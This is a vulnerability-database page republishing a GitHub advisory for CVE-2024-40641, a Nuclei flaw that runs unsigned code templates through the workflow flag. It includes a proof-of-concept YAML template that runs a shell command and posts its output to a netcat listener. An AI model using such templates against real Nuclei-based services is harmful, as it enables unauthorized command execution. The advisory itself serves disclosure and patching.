7.4

CVSS Score

3.1

Basic Information

CVE ID

CVE-2024-40641

GHSA ID

GHSA-c3q9-c27p-cw9h

EPSS Score

0.01907%

CWE

CWE-78

Published

7/17/2024

Updated

8/6/2024

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2024-40641

CVE-2024-40641:
projectdiscovery/nuclei allows unsigned code template execution through workflows

Summary

Find a way to execute code template without -code option and signature.

Details

write a code.yaml:

id: code

info:
  name: example code template
  author: ovi3


code:
  - engine:
      - sh
      - bash
    source: |
      id

http:
  - raw:
      - |
        POST /re HTTP/1.1
        Host: {{Hostname}}

        {{code_response}}

workflows:
  - matchers:
    - name: t

using nc to listen on 80:

nc -lvvnp 80

execute PoC template with nuclei:

./nuclei -disable-update-check  -w code.yaml -u http://127.0.0.1 -vv -debug

and nc will get id command output.

We use -w to specify a workflow file, not -t to template file. and notice there is a workflows field in code.yaml to pretend to be a workflow file.

Test in Linux and Nuclei v3.2.9

Impact

Some web applications inherit from Nuclei and allow users to edit and execute workflow files. In this case, users can execute arbitrary commands. (Although, as far as I know, most web applications use -t to execute)

(GitHub Advisory)

7.4

CVSS Score

3.1

Basic Information

CVE ID

CVE-2024-40641

GHSA ID

GHSA-c3q9-c27p-cw9h

EPSS Score

0.01907%

CWE

CWE-78

Published

7/17/2024

Updated

8/6/2024

KEV Status

Technology

Technical Details

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
github.com/projectdiscovery/nuclei/v3	go	< 3.3.0	3.3.0

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems from two key issues: 1) The workflow loader doesn't properly distinguish between legitimate workflow files and code templates masquerading as workflows, allowing execution through the -w flag. 2) The code execution engine processes unauthorized code blocks when they appear in workflow-context files. The combination of these flaws bypasses the -code flag requirement and signature validation. The high confidence for the workflow loader comes from its direct role in processing the malicious YAML structure, while the medium confidence for the executor compilation reflects the broader execution context handling.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Summ*ry *in* * w*y to *x**ut* *o** t*mpl*t* wit*out -*o** option *n* si*n*tur*. ### **t*ils writ* * `*o**.y*ml`: ```y*ml i*: *o** in*o: n*m*: *x*mpl* *o** t*mpl*t* *ut*or: ovi* *o**: - *n*in*: - s* - **s* sour**: |

Reasoning

T** vuln*r**ility st*ms *rom two k*y issu*s: *) T** work*low lo***r *o*sn't prop*rly *istin*uis* **tw**n l**itim*t* work*low *il*s *n* *o** t*mpl*t*s m*squ*r**in* *s work*lows, *llowin* *x**ution t*rou** t** -w *l**. *) T** *o** *x**ution *n*in* pro*

7.4

Basic Information

Concerned about an active attack path?

CVE-2024-40641: projectdiscovery/nuclei allows unsigned code template execution through workflows

Summary

Details

Impact

7.4

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

CVE-2024-40641:
projectdiscovery/nuclei allows unsigned code template execution through workflows

Vulnerability Intelligence
Miggo AI